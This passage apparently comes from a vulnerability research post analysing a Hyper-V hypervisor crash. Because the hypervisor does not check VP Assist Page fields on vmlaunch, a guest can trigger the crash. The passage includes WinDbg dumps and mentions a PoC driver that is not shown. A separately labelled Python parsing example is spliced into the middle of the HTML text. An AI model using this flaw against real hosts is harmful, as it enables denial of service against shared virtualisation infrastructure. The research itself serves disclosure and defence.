margin-top: 0pt; text-indent: 34.8pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When the instruction </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">cmp byte ptr [rdx+49h],al</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is executed, </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">rdx</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> contains 0, so the access goes to address zero. 
It is simply a NULL pointer dereference, but </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">rdx</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> cannot be controlled from the guest OS address space.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="118" src="https://lh4.googleusercontent.com/XTWCCo90D7_EdZR5dJQXqPy3U8QOthzgGKKn0IdMAPiZwEav_j59TW-XFRGdmbs-ucQlSM7-wx5IUYweX3IhC7GHeAWj_yRAvwSVhWxSu4cXjG1c5hMEPAZPpxU9zdiWj3MFuuRkfcOSrLjxYw" style="margin-left: 0px; margin-top: 0px;" width="217" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 34.8pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">There are no symbols for hvix64.exe, so the procedures are given BSOD-related functional names with a call-level index; the nearest level is 1. 
That code block prepares everything necessary for the </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">vmlaunch</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instruction to execute in hypervisor context.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 34.8pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When is this block executed?</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 34.8pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Caller block L2 is not interesting.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="181" 
src="https://lh5.googleusercontent.com/T2aeMX-5qe3KVLsaSZLxib7X6T82jtEF7FO7bAdnKHW1hdKUzegPlJSXaozWRB2o4Ez2qK_TV-LXrhrfSde-h1p89bEpXLahGaZdFeuVxhksqELX4ODy6EtwcAg76BWq2ZmEXoUbnmI0yhI9YA" style="margin-left: 0px; margin-top: 0px;" width="169" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 34.8pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">But the next caller level is important. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 34.8pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="372" src="https://lh3.googleusercontent.com/s4m3eg7JyJ7vY4AYvZc5X9ZJhK4vcNwOEqYmTWasOA99bXYcIy1GITGTwRU6NRc_cDv5yUdLXwWr8-gDO-cT7ulCoRhmZoaDbn3VHa7PxycQZbc_1Q2QIzDfUb5ciMaKIlQjiI1tKr9lsCtBug" style="margin-left: 0px; margin-top: 0px;" width="255" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; 
vertical-align: baseline; white-space: pre-wrap;">How is </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">r8b</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> controlled?</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="117" src="https://lh4.googleusercontent.com/4ar3NEGDDCO2ne0pmzFQZ9ZHVzrlL44O8qDzsQQ4ifJzmQi9ax_K6bQK7EgxDnSMD7bQEGQg4Y5BDKyZb3fd65NP6rM-husp_iytqgtqpmczbrfo2Q-qPpyii226MqUdZ-3mnZVKqqy4opQqBw" style="margin-left: 0px; margin-top: 0px;" width="254" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When the VP Assist Page is zeroed:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; 
margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WINDBG>dps poi(@rsi+198)+40</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c5608040 </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c000 – address of the overlay VP Assist Page. It does not change after a host OS reboot.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c5608048 00000000`000f000f</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c5608050 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c5608058 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 
0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c5608060 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WINDBG>dps ffffe802`c561c000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c000 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c008 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c010 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: 
none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c018 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c020 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c028 00000000`00000000 – rcx+28h</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c030 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">if rcx+28 != 0, then r8b = 1.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; 
text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We can debug the PoC driver in the guest OS step by step and see the physical and virtual addresses of the variables that are passed to the hypervisor:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="334" src="https://lh5.googleusercontent.com/Uqa_Bh4tv1e0kFliVc78rmNp7FW2EjRdFod6fXEeu5nlZv2hoeU2H8XsXALYFV5FKHIeysrDZYSCG2XStduIckGNivLAV6k2K0NI-4AaD4wVeEsBGVYl-ngYTbeGqW8Z8G8RkVpgQDhoeHXoWw" style="margin-left: 0px; margin-top: 0px;" width="356" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="88" 
src="https://lh6.googleusercontent.com/gtVdIlaXu2pS05wqracu6e1nqc_MjDfTpyqDCJTpb3fZ9xNJDom8ap2S-OG90MH8ZqNXPbkYXxqUTTjGhZEzB4bWjSDUrK84E4FprA5PUCt_fTSD918QwuSoc6pJO0PrxahM3oR8nMYuMaPnCA" style="margin-left: 0px; margin-top: 0px;" width="553" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WINDBG>dps ffffe802`c561c000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c000 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c008 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c010 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: 
black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c018 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c020 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c028 </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">00000000`00000001</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> - </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">pHvVpPage->EnlightenVmEntry</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c030 </span><span face="" style="background-color: 
transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">00000000`7ff23000</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">- pHvVpPage->CurrentNestedVmcs</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c038 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c040 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c048 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; 
text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c050 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c058 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The next action is very simple: if pHvVpPage->EnlightenVmEntry == 0, we get a BSOD. 
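
As an added example (not code from the original post or from the PoC driver), the Python below decodes the VP Assist Page fields that the dumps above annotate (EnlightenVmEntry at +0x28, CurrentNestedVmcs at +0x30, following the HV_VP_ASSIST_PAGE layout of the TLFS), rebuilds a page from WinDbg dps output, and runs an illustrative consistency check of the kind a hypervisor would need before trusting the page; the dps parser, the check function and the three sample pages (zeroed, filled as in the second dump, and the 0x11-filled buffer from the overlay experiment) are assumptions of this example, not Microsoft's code.

```python
# Added example (not code from the original post): decode the enlightenment
# fields of a Hyper-V VP Assist Page and rebuild a page from WinDbg "dps"
# output like the dumps shown above. Offsets follow the HV_VP_ASSIST_PAGE
# layout from the Hyper-V TLFS; field names match the PoC's pHvVpPage usage.

PAGE_SIZE = 0x1000

# Offsets inside HV_VP_ASSIST_PAGE (TLFS layout). The two the PoC cares about
# are the ones the dumps annotate: +0x28 (rcx+28h in hvix64) and +0x30.
OFF_APIC_ASSIST = 0x00          # UINT32 ApicAssist
OFF_NESTED_CONTROL = 0x20       # HV_NESTED_ENLIGHTENMENTS_CONTROL (8 bytes)
OFF_ENLIGHTEN_VMENTRY = 0x28    # UINT8  EnlightenVmEntry
OFF_CURRENT_NESTED_VMCS = 0x30  # UINT64 CurrentNestedVmcs (GPA of the eVMCS)


def _u64(page, off):
    """Little-endian qword at offset 'off' (x86-64 guest memory)."""
    return int.from_bytes(page[off:off + 8], "little")


def page_from_dps(dps_text, page_base):
    """Rebuild a 4 KiB page from WinDbg 'dps' lines ("addr value [annotation]").

    The command line ("WINDBG>dps ...") and trailing annotations such as
    "- pHvVpPage->EnlightenVmEntry" are ignored; qwords outside the page are
    skipped. Addresses and values use WinDbg's ffffe802`c561c000 notation.
    """
    page = bytearray(PAGE_SIZE)
    for line in dps_text.splitlines():
        parts = line.split()
        if len(parts) >= 2:
            try:
                addr = int(parts[0].replace("`", ""), 16)
                value = int(parts[1].replace("`", ""), 16)
            except ValueError:
                continue  # not an "address value" line
            off = addr - page_base
            if off >= 0 and PAGE_SIZE - 8 >= off and off % 8 == 0:
                page[off:off + 8] = value.to_bytes(8, "little")
    return bytes(page)


def parse_vp_assist_page(page):
    """Decode the fields of a VP Assist Page that the PoC and hvix64 look at."""
    if len(page) != PAGE_SIZE:
        raise ValueError("VP Assist Page must be exactly one 4 KiB page")
    return {
        "ApicAssist": int.from_bytes(page[OFF_APIC_ASSIST:OFF_APIC_ASSIST + 4], "little"),
        "NestedControl": _u64(page, OFF_NESTED_CONTROL),
        "EnlightenVmEntry": page[OFF_ENLIGHTEN_VMENTRY],
        "CurrentNestedVmcs": _u64(page, OFF_CURRENT_NESTED_VMCS),
    }


def check_enlightened_vmentry(fields):
    """Illustrative consistency check (an assumption about what a hypervisor-
    side sanity check would need to cover before trusting the page; not
    Microsoft's code). Returns a list of problems; empty means consistent.
    """
    problems = []
    flag = fields["EnlightenVmEntry"]
    vmcs = fields["CurrentNestedVmcs"]
    if flag == 0:
        problems.append("EnlightenVmEntry is 0: no enlightened VM entry requested")
    elif flag != 1:
        problems.append("EnlightenVmEntry is not a boolean 0/1: 0x%x" % flag)
    if vmcs == 0:
        problems.append("CurrentNestedVmcs is 0")
    elif vmcs % PAGE_SIZE != 0:
        problems.append("CurrentNestedVmcs is not page aligned: 0x%x" % vmcs)
    return problems


# Constructed sample input mirroring the second 'dps' dump above (the page
# after the PoC filled it); the zeroed first dump is just bytes(PAGE_SIZE).
VP_PAGE_BASE = 0xffffe802c561c000
FILLED_DUMP = """\
WINDBG>dps ffffe802`c561c000
ffffe802`c561c000 00000000`00000000
ffffe802`c561c008 00000000`00000000
ffffe802`c561c010 00000000`00000000
ffffe802`c561c018 00000000`00000000
ffffe802`c561c020 00000000`00000000
ffffe802`c561c028 00000000`00000001 - pHvVpPage->EnlightenVmEntry
ffffe802`c561c030 00000000`7ff23000 - pHvVpPage->CurrentNestedVmcs
ffffe802`c561c038 00000000`00000000
"""


def demo():
    """Zeroed page (BSOD case) vs. filled page vs. the 0x11-filled buffer."""
    results = {}
    for name, page in (("zeroed", bytes(PAGE_SIZE)),
                       ("filled", page_from_dps(FILLED_DUMP, VP_PAGE_BASE)),
                       ("fill_0x11", bytes([0x11]) * PAGE_SIZE)):
        fields = parse_vp_assist_page(page)
        results[name] = (fields, check_enlightened_vmentry(fields))
    return results


if __name__ == "__main__":
    for name, (fields, problems) in demo().items():
        print(name, hex(fields["EnlightenVmEntry"]),
              hex(fields["CurrentNestedVmcs"]), problems)
```
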
The hypervisor simply does not verify the </span><span face="" style="font-size: 10.6667px; text-indent: 0px; white-space: pre-wrap;">VP Assist Page</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> content when </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">vmlaunch</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is executed.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Overlay page initialization problem</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 
400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The BSOD is not the only problem. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The 2</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: 0.6em; vertical-align: super;">nd</span></span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> problem is that even if the </span><span face="" style="font-size: 10.6667px; text-indent: 0px; white-space: pre-wrap;">VP Assist Page was filled with actual values</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> before writing to the </span><span face="" style="font-size: 10.6667px; font-weight: 700; text-indent: 0px; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE </span><span face="" style="font-size: 10.6667px; text-indent: 0px; white-space: pre-wrap;">msr,</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> the parameters will not be passed to the hypervisor. Why does this happen? 
